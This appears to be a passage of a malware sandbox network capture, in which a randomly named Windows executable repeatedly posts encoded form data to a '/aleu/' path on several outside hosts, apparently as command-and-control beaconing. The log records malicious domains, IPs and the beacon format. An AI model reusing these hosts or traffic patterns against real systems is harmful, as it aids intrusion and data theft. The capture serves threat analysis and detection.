                                                                                                                                                                          Apr 26, 2024 07:42:41.024231911 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://oblzpezqqfxqijsk.app" + "?p="+window.location.pathname + window.location.search.replace(
                                                                                                                                                                          Apr 26, 2024 07:42:49.105999947 CEST6OUTData Raw: 47
                                                                                                                                                                          Data Ascii: G
                                                                                                                                                                          Apr 26, 2024 07:43:02.908773899 CEST6OUTData Raw: 45
                                                                                                                                                                          Data Ascii: E


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          13192.168.2.749739178.211.137.59802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:46.697215080 CEST774OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 49 66 6f 62 61 79 72 79 62 49 2f 65 6d 76 70 70 4f 30 78 31 78 64 39 38 32 56 6e 73 59 4c 2b 78 33 57 61 73 41 75 71 54 6f 4b 6a 37 6e 41 36 36 57 4d 4c 4a 61 6d 32 46 79 71 7a 73 4a 4a 78 76 64 77 75 7a 30 69 59 69 56 39 47 77 65 76 63 44 4d 34 58 65 63 49 41 67 4b 44 48 78 47 52 42 6e 6e 2b 36 4c 6a 32 56 54 50 39 35 38 4f 78 67 71 62 32 54 69 6a 75 62 36 4d 39 57 42 6c 72 4e 30 51 52 6c 39 65 61 44 4a 4c 51 49 68 4d 65 4e 66 41 43 2f 68 63 30 6a 71 66 6e 66 6a 57 4a 39 50 68 59 48 49 39 79 65 64 7a 4a 4e 71 6e 74 59 35 4f 6b 75 43 47 6b 6c 4a 56 67 2f 56 77 4a 7a 64 79 2f 30 4a 68 51 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hc0jqfnfjWJ9PhYHI9yedzJNqntY5OkuCGklJVg/VwJzdy/0JhQ==
                                                                                                                                                                          Apr 26, 2024 07:42:46.952560902 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:46 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          14192.168.2.749740178.211.137.59802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:49.483671904 CEST794OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 75 78 33 33 71 73 53 73 43 54 76 4b 6a 37 67 77 36 37 53 4d 4c 30 61 6d 71 72 79 72 66 73 4a 4e 5a 76 64 78 2b 7a 30 31 45 6a 56 74 47 32 57 50 63 37 42 59 58 65 63 49 41 67 4b 44 43 6d 47 52 35 6e 6d 4e 53 4c 69 54 70 51 52 4e 35 39 50 78 67 71 52 57 54 6d 6a 75 62 49 4d 2f 6a 55 6c 70 46 30 51 54 39 39 65 4c 44 47 42 51 49 6e 49 65 4d 54 47 53 58 78 5a 56 4c 75 61 48 6e 6d 53 4f 74 58 6b 75 61 71 6e 51 53 78 74 59 31 52 6a 76 38 50 5a 43 7a 33 45 6c 68 52 59 43 4c 30 76 2b 57 33 2f 74 56 4e 33 76 35 59 44 47 6a 31 55 36 4e 6c 38 53 42 70 4f 73 30 2f 48 32 38 3d
                                                                                                                                                                          Data Ascii: MzYDklf=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtY1Rjv8PZCz3ElhRYCL0v+W3/tVN3v5YDGj1U6Nl8SBpOs0/H28=
                                                                                                                                                                          Apr 26, 2024 07:42:49.740091085 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:49 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          15192.168.2.749741178.211.137.59802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:52.268218040 CEST1807OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 6d 78 33 46 79 73 41 4e 43 54 75 4b 6a 37 76 67 36 41 53 4d 4c 54 61 6d 79 76 79 71 6a 38 4a 50 68 76 53 7a 6d 7a 67 51 77 6a 4d 64 47 32 55 50 63 41 4d 34 57 63 63 49 77 6b 4b 44 79 6d 47 52 35 6e 6d 4c 75 4c 30 32 56 51 54 4e 35 38 4f 78 67 6d 62 32 54 4b 6a 75 43 39 4d 2f 6d 76 6c 5a 6c 30 54 7a 74 39 53 5a 72 47 62 51 49 6c 50 65 4e 4f 47 53 4b 32 5a 56 58 59 61 48 54 4d 53 4a 5a 58 6b 6f 54 73 6a 52 43 68 76 6f 64 30 67 4d 56 6a 52 69 2f 54 43 6d 56 30 58 79 6a 55 73 76 75 71 37 4c 70 62 35 76 73 33 66 6c 62 71 62 37 70 50 78 55 34 47 55 4d 45 43 63 67 42 4c 52 4b 43 57 49 2b 64 79 48 6f 59 4a 2f 43 74 6f 71 37 72 57 35 45 68 72 38 54 50 79 45 42 30 33 37 78 5a 4d 35 4c 65 65 37 67 59 39 52 61 58 69 4f 72 46 79 55 7a 4f 66 52 65 53 45 36 68 46 55 4c 70 4b 55 6d 33 6c 35 5a 43 6c 39 44 57 62 46 48 57 73 70 41 4f 2f 74 4b 44 6e 64 57 6b 32 61 64 55 74 30 61 4c 31 64 55 4a 7a 41 70 2f 59 66 33 55 77 4d 47 4a 79 32 6e 46 70 34 68 41 4f 4a 65 70 6b 7a 47 4c 4b 66 79 4a 34 54 55 58 78 50 62 6f 49 72 46 46 58 2f 53 66 5a 76 31 6c 70 54 37 6e 63 42 63 41 52 49 78 59 58 46 56 55 6a 50 7a 6c 59 78 78 72 39 43 34 67 7a 77 74 42 73 4e 57 58 4d 59 33 2b 39 41 39 2b 46 6b 61 35 44 4a 66 58 41 43 49 57 50 6b 49 6a 6b 4a 58 37 66 67 4e 31 7a 76 59 33 39 52 63 77 79 45 4f 34 67 74 74 34 39 65 4f 2f 31 49 62 48 48 67 4e 62 74 69 36 34 52 56 6a 5a 4a 5a 45 70 2b 69 2b 6b 55 6d 58 38 31 53 62 4c 31 53 6c 64 43 4d 38 42 6f 6e 4c 77 64 42 48 69 73 6f 54 54 4f 31 35 43 70 33 36 36 75 57 75 75 33 33 6d 62 54 44 44 69 51 63 2b 7a 31 37 30 5a 57 74 47 32 36 47 69 52 33 6f 62 41 72 6c 73 4b 2b 35 4d 51 45 67 38 5a 53 6e 78 61 6d 6e 78 63 49 46 63 68 73 38 7a 46 7a 70 78 33 76 51 50 44 72 48 4d 56 6c 75 59 67 6c 4d 75 71 70 4e 65 6c 7a 6c 42 68 71 72 6f 62 6b 6c 30 75 65 66 66 68 33 6e 37 5a 46 56 52 78 43 6c 56 41 63 71 65 72 7a 4d 57 77 49 6e 6a 64 50 67 6c 4e 52 44 79 67 6b 6f 66 45 31 48 4f 71 47 62 4b 46 50 49 77 2b 57 79 56 6b 31 38 77 49 36 32 4f 6a 46 53 35 61 4b 4f 78 42 76 79 46 50 45 79 4e 6f 6f 54 6c 42 50 63 43 2f 4f 6e 38 4c 59 5a 50 70 73 67 50 6a 56 52 43 43 7a 51 37 51 68 77 6e 4e 67 35 74 35 73 50 37 6f 53 79 51 39 43 4f 30 34 34 79 4d 34 5a 4d 46 45 4d 47 62 33 35 53 56 6d 70 36 64 36 67 6e 4a 62 47 4b 75 6e 48 78 4c 52 32 4f 45 50 76 72 46 6d 47 7a 63 38 78 59 53 45 67 57 39 69 32 44 31 62 71 74 67 6d 44 32 64 58 78 72 53 4f 79 57 4d 65 65 34 72 31 41 42 55 54 62 61 62 56 4e 6b 50 64 39 35 52 47 4e 71 6b 71 70 31 74 72 35 30 56 44 4b 36 6c 67 4a 31 6e 62 33 6f 68 59 38 6d 62 7a 38 65 4c 34 76 64 47 31 49 76 66 35 77 38 45 39 46 32 41 4b 31 5a 33 37 48 67 43 45 6a 6e 4d 39 79 49 76 44 7a 73 4b 35 69 75 2b 6d 4d 36 63 55 79 4c 49 33 79 63 64 79 5a 2f 69 34 57 70 4b 4b 64 5a 66 65 49 4a 6f 64 6e 70 37 6d 62 55 36 79 38 79 42 7a 58 32 75 53 76 66 6f 55 63 50 75 32 6a 2f 45 54 47 38 44 4a 4f 56 49 69 59 69 64 4f 7a 32 49 6d 45 32 7a 48 64 49 74 32 4b 6e 36 78 6a 4f 57 77 46 33 30 4f 4f 71 44 4c 6e 7a 30 41 54 31 72 75 37 69 56 34 36 71 4a 74 37 38 5a 54 50 72 67 4e 34 37 63 58 6b 2b 4e 54 36 4e 63 31 39 66 2b 34 49 41 44 35 47 43 47 43 6b 58 5a 78 46 37 71 4e 65 67 4b 74 73 4f 35 65 6b 32 34 6a 54 2b 58 31 38 79 59 6b 33 36 33 64 64 30 6a 62 6f 6a 6d 76 6a 75 37 4a 58 58 50 2f 68 72 61 4d 56 7a 58 2b 58 62 32 4b 59 7a 34 61 42 46 68 39 4e 55 4d 46 64 62 44 55 38 58 34 35 6f 52 4f 4a 66 76 61 53 43 53 59 68 68 32 2f 72 62 65 6b 72 4d 2b 46 72 68 37 35 68 4c 35 4f 46 39 58 31 73 32 6d 41 32 36 4e 75 43 6f 44 46 6d 53 51 2b 54 72 46 58 42 57 72 35 31 39 4f 6c 70 2b 54 2b 49 61 77 4c 49 46 77 37 37 7a 46 6f 49 54 64 63 58 4f 6b 77 2f 5a 6b 6e 2b 49 59
                                                                                                                                                                          Data Ascii: MzYDklf=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+mx3FysANCTuKj7vg6ASMLTamyvyqj8JPhvSzmzgQwjMdG2UPcAM4WccIwkKDymGR5nmLuL02VQTN58Oxgmb2TKjuC9M/mvlZl0Tzt9SZrGbQIlPeNOGSK2ZVXYaHTMSJZXkoTsjRChvod0gMVjRi/TCmV0XyjUsvuq7Lpb5vs3flbqb7pPxU4GUMECcgBLRKCWI+dyHoYJ/Ctoq7rW5Ehr8TPyEB037xZM5Lee7gY9RaXiOrFyUzOfReSE6hFULpKUm3l5ZCl9DWbFHWspAO/tKDndWk2adUt0aL1dUJzAp/Yf3UwMGJy2nFp4hAOJepkzGLKfyJ4TUXxPboIrFFX/SfZv1lpT7ncBcARIxYXFVUjPzlYxxr9C4gzwtBsNWXMY3+9A9+Fka5DJfXACIWPkIjkJX7fgN1zvY39RcwyEO4gtt49eO/1IbHHgNbti64RVjZJZEp+i+kUmX81SbL1SldCM8BonLwdBHisoTTO15Cp366uWuu33mbTDDiQc+z170ZWtG26GiR3obArlsK+5MQEg8ZSnxamnxcIFchs8zFzpx3vQPDrHMVluYglMuqpNelzlBhqrobkl0ueffh3n7ZFVRxClVAcqerzMWwInjdPglNRDygkofE1HOqGbKFPIw+WyVk18wI62OjFS5aKOxBvyFPEyNooTlBPcC/On8LYZPpsgPjVRCCzQ7QhwnNg5t5sP7oSyQ9CO044yM4ZMFEMGb35SVmp6d6gnJbGKunHxLR2OEPvrFmGzc8xYSEgW9i2D1bqtgmD2dXxrSOyWMee4r1ABUTbabVNkPd95RGNqkqp1tr50VDK6lgJ1nb3ohY8mbz8eL4vdG1Ivf5w8E9F2AK1Z37HgCEjnM9yIvDzsK5iu+mM6cUyLI3ycdyZ/i4WpKKdZfeIJodnp7mbU6y8yBzX2uSvfoUcPu2j/ETG8DJOVIiYidOz2ImE2zHdIt2Kn6xjOWwF30OOqDLnz0AT1ru7iV46qJt78ZTPrgN47cXk+NT6Nc19f+4IAD5GCGCkXZxF7qNegKtsO5ek24jT+X18yYk363dd0jbojmvju7JXXP/hraMVzX+Xb2KYz4aBFh9NUMFdbDU8X45oROJfvaSCSYhh2/rbekrM+Frh75hL5OF9X1s2mA26NuCoDFmSQ+TrFXBWr519Olp+T+IawLIFw77zFoITdcXOkw/Zkn+IY
                                                                                                                                                                          Apr 26, 2024 07:42:52.527693033 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:52 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          16192.168.2.749742178.211.137.59802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:55.058046103 CEST507OUTGET /aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:42:55.311853886 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:55 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          17192.168.2.749743203.161.46.103802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:09.237421989 CEST753OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Origin: http://www.fairmarty.top
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 4c 77 4a 39 45 44 4e 48 6c 4b 36 58 68 55 37 41 6b 41 33 37 43 58 75 48 48 38 79 44 79 62 49 6c 31 38 34 38 51 4d 34 4b 67 43 67 63 66 62 43 7a 46 6e 59 55 58 6e 50 66 54 30 48 71 54 58 49 52 46 62 31 2b 64 76 2b 63 4b 66 5a 48 51 4a 4d 31 48 71 42 4e 71 4f 64 75 38 6f 57 76 64 6a 53 63 62 4e 68 61 74 79 6c 5a 63 67 67 44 6d 72 48 67 34 61 44 74 6f 4b 56 4e 74 33 59 6a 56 4d 4e 69 72 4e 6c 61 33 2b 54 6d 4a 47 4c 59 58 62 31 46 72 51 7a 68 44 38 6a 35 62 6b 6c 62 70 68 6b 34 67 52 76 2f 50 77 48 4e 6d 4d 78 42 37 30 62 6e 79 6e 36 47 72 52 34 59 42 78 63 55 6f 4b 70 44 37 42 56 52 76 67 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=4GbMTgr0j9lSLwJ9EDNHlK6XhU7AkA37CXuHH8yDybIl1848QM4KgCgcfbCzFnYUXnPfT0HqTXIRFb1+dv+cKfZHQJM1HqBNqOdu8oWvdjScbNhatylZcggDmrHg4aDtoKVNt3YjVMNirNla3+TmJGLYXb1FrQzhD8j5bklbphk4gRv/PwHNmMxB70bnyn6GrR4YBxcUoKpD7BVRvg==
                                                                                                                                                                          Apr 26, 2024 07:43:09.440253019 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:09 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          18192.168.2.749744203.161.46.103802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:11.967274904 CEST773OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Origin: http://www.fairmarty.top
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.fairmarty.top/aleu/
